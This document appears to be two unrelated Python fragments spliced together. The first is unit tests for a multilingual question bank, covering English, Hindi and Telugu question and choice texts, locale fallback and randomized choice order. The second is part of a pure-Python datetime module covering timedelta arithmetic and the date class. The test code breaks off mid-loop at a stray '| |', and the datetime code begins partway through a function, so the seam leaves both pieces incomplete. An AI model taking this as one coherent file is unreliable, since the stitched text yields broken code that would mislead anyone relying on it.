te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_text().text,
self._telugu_text
)
def test_first_available_question_text_if_locale_code_and_english_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_text().text,
self._telugu_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_text().text,
self._telugu_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_text().text,
self._telugu_text
)
class MultiLanguageMultipleChoiceQuestionTests(MultiLanguageBaseTestCase):
def setUp(self):
super(MultiLanguageMultipleChoiceQuestionTests, self).setUp()
def tearDown(self):
super(MultiLanguageMultipleChoiceQuestionTests, self).tearDown()
def test_can_set_multiple_choice_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
def test_can_clear_choice_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
form = self._bank.get_question_form_for_update(question.ident)
form.clear_choice_texts(choice_identifier)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': '',
'name': ''
}]
)
def test_can_clear_choices(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
form = self._bank.get_question_form_for_update(question.ident)
form.clear_choices()
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
0
)
self.assertEqual(
item.get_question().get_choices(),
[]
)
def test_can_remove_a_choice_text_by_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
form = self._bank.get_question_form_for_update(question.ident)
form.remove_choice_language(self._english().language_type, choice_identifier)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
2
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._hindi_text,
'name': ''
}]
)
def test_can_replace_a_choice_text(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
new_english_feedback = DisplayText(display_text_map={
'text': 'foo',
'languageTypeId': '639-2%3AENG%40ISO',
'scriptTypeId': '15924%3ALATN%40ISO',
'formatTypeId': 'TextFormats%3APLAIN%40okapia.net'
})
form = self._bank.get_question_form_for_update(question.ident)
form.edit_choice(new_english_feedback, choice_identifier)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(new_english_feedback), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': 'foo',
'name': ''
}]
)
def test_setting_proxy_locale_gets_choice_text_in_specified_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._hindi_text,
'name': ''
}]
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
def test_english_default_choice_text_if_locale_code_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
def test_first_available_choice_text_if_locale_code_and_english_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
def test_multi_language_plays_well_with_randomized_order(self):
form = self._bank.get_item_form_for_create([MC_RANDOMIZED_ITEM_RECORD])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MC_RANDOMIZED_RECORD,
MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
form.add_choice(self._english(), identifier='1')
form.add_choice(self._hindi(), identifier='1')
form.add_choice(self._telugu(), identifier='1')
form.add_choice(self._english(), identifier='2')
form.add_choice(self._hindi(), identifier='2')
form.add_choice(self._telugu(), identifier='2')
form.add_choice(self._english(), identifier='3')
form.add_choice(self._hindi(), identifier='3')
form.add_choice(self._telugu(), identifier='3')
self._bank.create_question(form)
different_hindi_order = 0
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
for i in range(0, 10):
choices = hi_item.get_question().get_choices()
choice_order = [c['id'] for c in choices]
choice_texts = [c['text'] for c in choices]
if choice_order != ['1', '2', '3']:
different_hindi_order += 1
self.assertEqual(
choice_texts,
[self._hindi_text, self._hindi_text, self._hindi_text]
)
self.assertTrue(different_hindi_order > 0)
different_english_order = 0
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
for i in range(0, 10):
choices = en_item.get_question().get_choices()
choice_order = [c['id'] for c in choices]
choice_texts = [c['text'] for c in choices]
if choice_order != ['1', '2', '3']:
different_english_order += 1
self.assertEqual(
choice_texts,
[self._english_text, self._english_text, self._english_text]
)
self.assertTrue(different_english_order > 0)
different_telugu_order = 0
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
for i in range(0, 10):
choices = te_item.get_question().get_choices()
| |
microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += seconds
microseconds = round(microseconds + usdouble)
assert isinstance(s, int)
assert isinstance(microseconds, int)
assert abs(s) <= 3 * 24 * 3600
assert abs(microseconds) < 3.1e6
# Just a little bit of carrying possible for microseconds and seconds.
seconds, us = divmod(microseconds, 1000000)
s += seconds
days, s = divmod(s, 24*3600)
d += days
assert isinstance(d, int)
assert isinstance(s, int) and 0 <= s < 24*3600
assert isinstance(us, int) and 0 <= us < 1000000
if abs(d) > 999999999:
raise OverflowError("timedelta # of days is too large: %d" % d)
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
self._hashcode = -1
return self
def __repr__(self):
args = []
if self._days:
args.append("days=%d" % self._days)
if self._seconds:
args.append("seconds=%d" % self._seconds)
if self._microseconds:
args.append("microseconds=%d" % self._microseconds)
if not args:
args.append('0')
return "%s.%s(%s)" % (self.__class__.__module__,
self.__class__.__qualname__,
', '.join(args))
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
return ((self.days * 86400 + self.seconds) * 10**6 +
self.microseconds) / 10**6
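# Example (added comment): timedelta(days=1, microseconds=1).total_seconds()
# evaluates to 86400.000001 via the integer arithmetic above.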
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds)
return NotImplemented
def __rsub__(self, other):
if isinstance(other, timedelta):
return -self + other
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(-self._days,
-self._seconds,
-self._microseconds)
def __pos__(self):
return self
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if isinstance(other, int):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days * other,
self._seconds * other,
self._microseconds * other)
if isinstance(other, float):
usec = self._to_microseconds()
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(usec * a, b))
return NotImplemented
__rmul__ = __mul__
def _to_microseconds(self):
return ((self._days * (24*3600) + self._seconds) * 1000000 +
self._microseconds)
def __floordiv__(self, other):
if not isinstance(other, (int, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec // other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec // other)
def __truediv__(self, other):
if not isinstance(other, (int, float, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec / other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, _divide_and_round(usec, other))
if isinstance(other, float):
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(b * usec, a))
def __mod__(self, other):
if isinstance(other, timedelta):
r = self._to_microseconds() % other._to_microseconds()
return timedelta(0, 0, r)
return NotImplemented
def __divmod__(self, other):
if isinstance(other, timedelta):
q, r = divmod(self._to_microseconds(),
other._to_microseconds())
return q, timedelta(0, 0, r)
return NotImplemented
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return NotImplemented
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
return NotImplemented
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
return NotImplemented
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
return NotImplemented
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
return NotImplemented
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
def __bool__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-999999999)
timedelta.max = timedelta(days=999999999, hours=23, minutes=59, seconds=59,
microseconds=999999)
timedelta.resolution = timedelta(microseconds=1)
class date:
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__eq__, __le__, __lt__, __ge__, __gt__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
if (month is None and
isinstance(year, (bytes, str)) and len(year) == 4 and
1 <= ord(year[2:3]) <= 12):
# Pickle support
if isinstance(year, str):
try:
year = year.encode('latin1')
except UnicodeEncodeError:
# More informative error message.
raise ValueError(
"Failed to encode latin1 string when unpickling "
"a date object. "
"pickle.load(data, encoding='latin1') is assumed.")
self = object.__new__(cls)
self.__setstate(year)
self._hashcode = -1
return self
year, month, day = _check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hashcode = -1
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Construct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
@classmethod
def fromisoformat(cls, date_string):
"""Construct a date from the output of date.isoformat()."""
if not isinstance(date_string, str):
raise TypeError('fromisoformat: argument must be str')
try:
assert len(date_string) == 10
return cls(*_parse_isoformat_date(date_string))
except Exception:
raise ValueError(f'Invalid isoformat string: {date_string!r}')
@classmethod
def fromisocalendar(cls, year, week, day):
"""Construct a date from the ISO year, week number and weekday.
This is the inverse of the date.isocalendar() function"""
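# Example (added comment): date.fromisocalendar(2004, 1, 1) == date(2003, 12, 29),
# the Monday of ISO week 1 of 2004; date(2003, 12, 29).isocalendar() == (2004, 1, 1).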
# Year is bounded this way because 9999-12-31 is (9999, 52, 5)
if not MINYEAR <= year <= MAXYEAR:
raise ValueError(f"Year is out of range: {year}")
if not 0 < week < 53:
out_of_range = True
if week == 53:
# ISO years have 53 weeks in them on years starting with a
# Thursday and leap years starting on a Wednesday
first_weekday = _ymd2ord(year, 1, 1) % 7
if (first_weekday == 4 or (first_weekday == 3 and
_is_leap(year))):
out_of_range = False
if out_of_range:
raise ValueError(f"Invalid week: {week}")
if not 0 < day < 8:
raise ValueError(f"Invalid weekday: {day} (range is [1, 7])")
# Now compute the offset from (Y, 1, 1) in days:
day_offset = (week - 1) * 7 + (day - 1)
# Calculate the ordinal day for monday, week 1
day_1 = _isoweek1monday(year)
ord_day = day_1 + day_offset
return cls(*_ord2ymd(ord_day))
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
return "%s.%s(%d, %d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
def strftime(self, fmt):
"Format using strftime()."
return _wrap_strftime(self, fmt, self.timetuple())
def __format__(self, fmt):
if not isinstance(fmt, str):
raise TypeError("must be str, not %s" % type(fmt).__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
return "%04d-%02d-%02d" % (self._year, self._month, self._day)
__str__ = isoformat
# Read-only field accessors